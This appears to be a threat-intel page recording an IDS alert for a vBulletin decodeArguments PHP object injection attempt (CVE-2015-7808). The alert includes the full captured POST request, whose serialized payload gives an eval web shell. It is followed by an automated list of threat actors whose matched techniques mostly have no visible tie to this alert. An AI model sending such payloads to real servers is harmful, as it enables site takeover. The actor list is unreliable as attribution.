Trusted Design

vBulletin 0-day exploit attempt

概要

[**] [1:10052324:2] 52324 VID72596 vBulletin vB_Api_Hook decodeArguments() PHP Object Injection Attempt Inbound (CVE-2015-7808) 12/30/2015-07:33:24.929349 47.88.13.149:2798 -> x.x.x.x:80 ==pcap== POST /forums/ajax/api/hook/decodeArguments HTTP/1.1=0D=0AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36=0D=0AContent-Type: application/x-www-form-urlencoded=0D=0AHost: x.x.x.x=0D=0AContent-Length: 316=0D=0AExpect: 100-continue=0D=0AConnection: Keep-Alive=0D=0A=0D=0A exit('abbcdeef');&arguments=3DO%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00*%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00*%00recordset%22%3Bs%3A17%3A%22eval%28%24_POST%5B%27a%27%5D%29%22%3B%7D ==pcap==

Created: 2026-02-23

Indicators

Indicatorsは見つかっていない。

類似Pulses

このPulseに関連する脅威アクター (事実ベース)

Kimsuky

Score: 15.26
Matched TTPs:
  • T1036.007 - Double File Extension
  • T1176.001 - Browser Extensions
  • T1055 - Process Injection
  • T1588.005 - Exploits
MITREへのリンク →

Mustang Panda

Score: 6.88
Matched TTPs:
  • T1036.007 - Double File Extension
  • T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →

APT32

Score: 5.20
Matched TTPs:
  • T1055 - Process Injection
  • T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →

Wizard Spider

Score: 8.13
Matched TTPs:
  • T1055 - Process Injection
  • T1055.001 - Dynamic-link Library Injection
  • T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →

PLATINUM

Score: 7.00
Matched TTPs:
  • T1055 - Process Injection
  • T1056.004 - Credential API Hooking
MITREへのリンク →

Turla

Score: 5.39
Matched TTPs:
  • T1055 - Process Injection
  • T1055.001 - Dynamic-link Library Injection
MITREへのリンク →

Lazarus Group

Score: 10.21
Matched TTPs:
  • T1574.013 - KernelCallbackTable
  • T1055.001 - Dynamic-link Library Injection
  • T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →

APT28

Score: 8.67
Matched TTPs:
  • T1546.015 - Component Object Model Hijacking
  • T1550.001 - Application Access Token
MITREへのリンク →

SideCopy

Score: 4.13
Matched TTPs:
  • T1614 - System Location Discovery
MITREへのリンク →

Volt Typhoon

Score: 4.13
Matched TTPs:
  • T1614 - System Location Discovery
MITREへのリンク →

APT29

Score: 9.08
Matched TTPs:
  • T1090.004 - Domain Fronting
  • T1027.006 - HTML Smuggling
MITREへのリンク →

Contagious Interview

Score: 7.28
Matched TTPs:
  • T1543.001 - Launch Agent
  • T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →

HAFNIUM

Score: 4.13
Matched TTPs:
  • T1550.001 - Application Access Token
MITREへのリンク →

Ember Bear

Score: 4.13
Matched TTPs:
  • T1588.005 - Exploits
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Kimsuky

Score: 0.72
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1588.005 - Exploits
  • T1055 - Process Injection
  • T1036.007 - Double File Extension
MITREへのリンク →

Related CVEs

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る